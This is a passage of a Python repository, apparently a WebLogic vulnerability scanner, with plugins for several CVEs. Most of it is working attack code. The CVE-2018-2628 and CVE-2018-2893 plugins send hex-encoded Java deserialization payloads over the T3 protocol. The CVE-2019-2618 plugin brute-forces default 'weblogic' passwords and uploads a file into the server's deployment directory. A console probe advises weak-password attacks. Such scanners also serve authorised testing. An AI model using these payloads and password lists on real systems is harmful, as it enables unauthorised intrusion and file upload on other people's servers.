payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 45 | payload+=data 46 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 47 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 48 | sock.send(bytes.fromhex(payload)) 49 | time.sleep(2) 50 | sock.send(bytes.fromhex(payload)) 51 | res = '' 52 | try: 53 | while True: 54 | res += sock.recv(4096).decode('utf-8','ignore') 55 | time.sleep(0.1) 56 | except Exception: 57 | pass 58 | return res 59 | 60 | def checkVul(self,res,index): 61 | p=re.findall(VER_SIG[index], res, re.S) 62 | if len(p)>0: 63 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 64 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 65 | print(Color.OKGREEN+'[+]CVE-2018-2628 漏洞存在'+Color.ENDC) 66 | else: 67 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 68 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 69 | 70 | def run(self,ip,port,index): 71 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 72 | sock.settimeout(15) 73 | server_addr = (ip, port) 74 | self.t3handshake(sock,server_addr) 75 | self.buildT3RequestObject(sock,port) 76 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 77 | self.checkVul(rs,index) 78 | -------------------------------------------------------------------------------- /app/plugins/CVE-2018-2893.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import socket 5 | import time 6 | import re 7 | import sys 8 | import logging 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | 13 | logging.basicConfig(filename='Weblogic.log', 14 | format='%(asctime)s %(message)s', 15 | filemode="w", level=logging.INFO) 16 | VUL='CVE-2018-2893' 17 | PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878'] 18 | VER_SIG=['StreamMessageImpl'] 19 | 20 | 21 | @ManageProcessor.plugin_register('CVE20182893') 22 | class CVE20182893(object): 23 | def process(self,ip,port): 24 | self.run(ip,port,0) 25 | 26 | def t3handshake(self,sock,server_addr): 27 | sock.connect(server_addr) 28 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 29 | #print(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a').decode('utf-8').encode()) 30 | time.sleep(1) 31 | res = sock.recv(1024) 32 | #print(res) 33 | #print('handshake successful') 34 | 35 | def buildT3RequestObject(self,sock,port): 36 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 37 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 38 | data3 = '1a7727000d3234322e323134' 39 | data4 = '2e312e32353461863d1d0000000078' 40 | for d in [data1,data2,data3,data4]: 41 | sock.send(bytes.fromhex(d)) 42 | time.sleep(2) 43 | #print('send request payload successful,recv length:%d'%(len(sock.recv(2048)))) 44 | 45 | 46 | def sendEvilObjData(self,sock,data): 47 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 48 | payload+=data 49 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 50 | #print('%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)) 51 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 52 | sock.send(bytes.fromhex(payload)) 53 | time.sleep(2) 54 | sock.send(bytes.fromhex(payload)) 55 | #res2 = sock.recv(4096) 56 | #time.sleep(2) 57 | #print('res2: -------') 58 | #print(res2) 59 | res = '' 60 | try: 61 | while True: 62 | res += sock.recv(4096).decode('utf-8','ignore') 63 | time.sleep(0.1) 64 | except Exception: 65 | pass 66 | #print('res+: ---',res) 67 | return res 68 | 69 | def checkVul(self,res,index): 70 | p=re.findall(VER_SIG[index], res, re.S) 71 | if len(p)>0: 72 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)) 73 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Color.ENDC) 74 | print(Color.OKGREEN+'[+]CVE-2018-2893 漏洞存在'+Color.ENDC) 75 | else: 76 | logging.info('[-]Target weblogic not detected {}'.format(VUL)) 77 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Color.ENDC) 78 | 79 | def run(self,ip,port,index): 80 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 81 | sock.settimeout(10) 82 | server_addr = (ip, port) 83 | self.t3handshake(sock,server_addr) 84 | self.buildT3RequestObject(sock,port) 85 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 86 | self.checkVul(rs,index) 87 | -------------------------------------------------------------------------------- /app/plugins/CVE-2018-2894.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re 6 | import logging 7 | 8 | 9 | from ..platform import ManageProcessor,Color 10 | 11 | logging.basicConfig(filename='Weblogic.log', 12 | format='%(asctime)s %(message)s', 13 | filemode="w", level=logging.INFO) 14 | 15 | VUL=['CVE-2018-2894'] 16 | headers = {'user-agent': 'ceshi/0.0.1'} 17 | 18 | @ManageProcessor.plugin_register('CVE20182894') 19 | class CVE20182894(object): 20 | def process(self,ip,port): 21 | self.run(ip,port,0) 22 | 23 | def islive(self,ur,port): 24 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/resources/setting/options/general' 25 | r = requests.get(url, headers=headers) 26 | return r.status_code 27 | 28 | def run(self,url,port,index): 29 | if self.islive(url,port)!=404: 30 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 31 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 32 | print(Color.OKGREEN+'[+]CVE-2018-2894 漏洞存在'+Color.ENDC) 33 | else: 34 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 35 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 36 | -------------------------------------------------------------------------------- /app/plugins/CVE-2019-2618.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import sys, re 6 | import traceback 7 | 8 | from ..platform import ManageProcessor,Color 9 | 10 | # 这个漏洞接口只能爆破5次密码,不然就会一直失败,因此比较鸡肋,存在一定运气成分。 11 | passwd = ['weblogic','weblogic1','weblogic10','weblogic123','Oracle@123'] 12 | 13 | @ManageProcessor.plugin_register('CVE20192618') 14 | class CVE20192618(object): 15 | def process(self,ip,port): 16 | self.run(ip,port) 17 | def check(self,url): 18 | vuln_url = url + "/bea_wls_deployment_internal/DeploymentService" 19 | payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"11.tmp\"\r\nContent-Type: text/html\r\n\r\n 12341234 \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--" 20 | success = False 21 | for password in passwd: 22 | headers = { 23 | 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma", 24 | "username":"weblogic", 25 | "password":password, 26 | 'wl_request_type': "app_upload", 27 | 'wl_upload_application_name': "/", 28 | 'archive': "true", 29 | } 30 | try: 31 | req = requests.post(url=vuln_url, data=payload,headers=headers) 32 | if "DeploymentService" not in req.text and req.status_code == 200 and '11.tmp' in req.text: 33 | serverName = re.findall('/servers/(.*?)/upload/', req.text, re.S)[0] 34 | print(Color.OKBLUE+"[+]口令爆破成功:weblogic/" + password+Color.ENDC) 35 | print(Color.OKBLUE+"[+]weblogic服务名:" + serverName+Color.ENDC) 36 | path = self.get_path(serverName) 37 | print(Color.OKBLUE+"[+]8位随机字符目录:" + path+Color.ENDC) 38 | #print(Color.GREEN+"[+]CVE-2019-2618漏洞存在"+Color.ENDC) 39 | self.testupload(url,password,path) 40 | success = True 41 | print(Color.OKGREEN+"[+]CVE-2019-2618 漏洞存在"+Color.ENDC) 42 | break 43 | else: 44 | print(Color.FAIL+"[-]口令爆破失败:weblogic/" + password+Color.ENDC) 45 | pass 46 | except: 47 | #print("[-]口令请求异常:weblogic/" + password) 48 | traceback.print_exc() 49 | pass 50 | if True != success: 51 | print(Color.FAIL+"[-]target Weblogic is not Vul CVE-2019-2618"+Color.ENDC) 52 | 53 | 54 | def testupload(self,url,password,path): 55 | vuln_url = url + "/bea_wls_deployment_internal/DeploymentService" 56 | headers = { 57 | 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma", 58 | "username":"weblogic", 59 | "password":password, 60 | 'wl_request_type': "app_upload", 61 | 'wl_upload_application_name': "..", 62 | 'archive': "true", 63 | } 64 | shell = "21232f297a57a5a743894a0e4a801fc3" 65 | payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"/tmp/_WL_internal/bea_wls_deployment_internal/{0}/war/test.tmp\"\r\nContent-Type: text/html\r\n\r\n {1} \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--".format(path,shell) 66 | upload_path = url + "/bea_wls_deployment_internal/test.tmp" 67 | try: 68 | req = requests.post(url=vuln_url, data=payload,headers=headers) 69 | req = requests.get(upload_path) 70 | if req.status_code == 200: 71 | print(Color.OKBLUE+"[+]上传文件成功: " + upload_path+Color.ENDC) 72 | except: 73 | print(Color.FAIL+"[-]上传文件失败....."+Color.ENDC) 74 | 75 | # 以下为webloigc服务8位随机字符目录计算代码 76 | def convert_n_bytes(self,n, b): 77 | bits = b * 8 78 | return (n + 2 ** (bits - 1)) % 2 ** bits - 2 ** (bits - 1) 79 | 80 | def convert_4_bytes(self,n): 81 | return self.convert_n_bytes(n, 4) 82 | 83 | def getHashCode(self,s): 84 | h = 0 85 | n = len(s) 86 | for i, c in enumerate(s): 87 | h = h + ord(c) * 31 ** (n - 1 - i) 88 | return self.convert_4_bytes(h) 89 | 90 | def toString(self,strs,radix): 91 | i = int(strs) 92 | digits = [ 93 | '0' , '1' , '2' , '3' , '4' , '5' , 94 | '6' , '7' , '8' , '9' , 'a' , 'b' , 95 | 'c' , 'd' , 'e' , 'f' , 'g' , 'h' , 96 | 'i' , 'j' , 'k' , 'l' , 'm' , 'n' , 97 | 'o' , 'p' , 'q' , 'r' , 's' , 't' , 98 | 'u' , 'v' , 'w' , 'x' , 'y' , 'z' 99 | ] 100 | buf = list(range(65)) 101 | charPos = 64 102 | negative = int(strs) < 0 103 | if not negative: 104 | i = -int(strs) 105 | 106 | while (i<=-radix): 107 | buf[int(charPos)] = digits[int(-(i%radix))] 108 | charPos = charPos - 1 109 | i = int(i / radix) 110 | buf[charPos] = digits[int(-i)] 111 | if negative: 112 | charPos = charPos - 1 113 | buf[charPos] = '-' 114 | return (buf[charPos:charPos+65-charPos]) 115 | 116 | def get_path(self,serverName): 117 | strings = "%s_%s_%s" % (serverName,"bea_wls_deployment_internal","bea_wls_deployment_internal.war") 118 | return "".join(self.toString(self.getHashCode(strings),36)).replace("-","") 119 | 120 | def run(self,ip,port): 121 | url = 'http://'+str(ip)+':'+str(port) 122 | self.check(url) 123 | -------------------------------------------------------------------------------- /app/plugins/WeblogicConsole.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import logging 5 | import sys 6 | import requests 7 | 8 | from ..platform import ManageProcessor,Color 9 | 10 | logging.basicConfig(filename='Weblogic.log', 11 | format='%(asctime)s %(message)s', 12 | filemode="w", level=logging.INFO) 13 | 14 | url = "http://192.168.3.32:7001/" 15 | 16 | 17 | @ManageProcessor.plugin_register('weblogic-console') 18 | class WeblogicCosole(object): 19 | headers = {'user-agent': 'ceshi/0.0.1'} 20 | def process(self,ip,port): 21 | self.run(ip,port) 22 | def islive(self,ur,port): 23 | url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp' 24 | r = requests.get(url, headers=self.headers) 25 | return r.status_code 26 | 27 | def run(self,url,port): 28 | if self.islive(url,port)==200: 29 | u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' 30 | logging.info("[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(u)) 31 | print(Color.OKBLUE+"[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(u)+Color.ENDC) 32 | print(Color.OKGREEN+'[+]Weblogic后台路径存在'+Color.ENDC) 33 | else: 34 | logging.info('[-]Target Weblogic console address not found!') 35 | print(Color.FAIL+"[-]Target Weblogic console address not found!"+Color.ENDC) 36 | -------------------------------------------------------------------------------- /app/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | __all__ = ['WeblogicConsole','CVE-2014-4210','CVE-2019-2725','CVE-2019-2729','CVE-2017-10271','CVE-2017-3506','CVE-2019-2618','CVE-2018-2894','CVE-2018-2628','CVE-2018-2893','CVE-2016-0638','CVE-2016-3510','CVE-2017-3248',] -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2014-4210.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2014-4210.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2016-0638.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2016-0638.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2016-3510.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2016-3510.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2017-10271.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2017-10271.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2017-3248.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2017-3248.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2017-3248.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2017-3248.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2017-3506.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2017-3506.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2018-2628.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2018-2628.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2018-2893.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2018-2893.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2018-2894.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2018-2894.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2018-2894.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2018-2894.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2019-2618.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2019-2618.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2019-2618.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2019-2618.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2019-2725.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2019-2725.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2019-2729.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2019-2729.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/CVE-2019-2729.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/CVE-2019-2729.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/WeblogicConsole.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/WeblogicConsole.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/WeblogicConsole.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/WeblogicConsole.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2014-4210.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2014-4210.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2016-0638.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2016-0638.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2016-3510.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2016-3510.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2017-10271.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2017-10271.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2017-3428.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2017-3428.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2017-3506.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2017-3506.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2018-2628.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2018-2628.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2018-2893.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2018-2893.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/cve-2019-2725.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/cve-2019-2725.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/plugin1.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/plugin1.cpython-37.pyc -------------------------------------------------------------------------------- /app/plugins/__pycache__/plugin2.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/plugins/__pycache__/plugin2.cpython-37.pyc -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | -------------------------------------------------------------------------------- /weblogicscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/weblogicscan.png --------------------------------------------------------------------------------